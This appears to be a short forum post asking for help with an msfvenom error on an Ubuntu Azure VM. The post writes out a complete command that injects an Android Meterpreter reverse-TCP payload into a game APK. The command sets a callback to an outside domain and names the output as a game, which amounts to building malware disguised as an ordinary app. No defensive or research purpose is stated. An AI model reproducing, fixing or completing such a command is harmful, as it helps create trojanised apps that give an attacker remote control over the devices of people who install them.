I am using Ubuntu 16 in Azure Virtual machine. Whenever i tried to inject a payload in a apk file using "msfvenom", i encountered this problem "Error: Malformed version number string 11:23:18 up 3 days, 20:38, 2 users, load average: 0.18, 0.10, 0.04".
My command for injecting- "msfvenom -p android/meterpreter/reverse_tcp -x game.apk LHOST=netzerro.me LPORT=5555 -o A_game_by_Ashvani.apk"
Referring to this Stackoverflow Answer i had also tried to write this command "_SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS" unset _JAVA_OPTIONS alias='java "$_SILENT_JAVA_OPTIONS"'" in /root/.bashrc this file. Plz help me.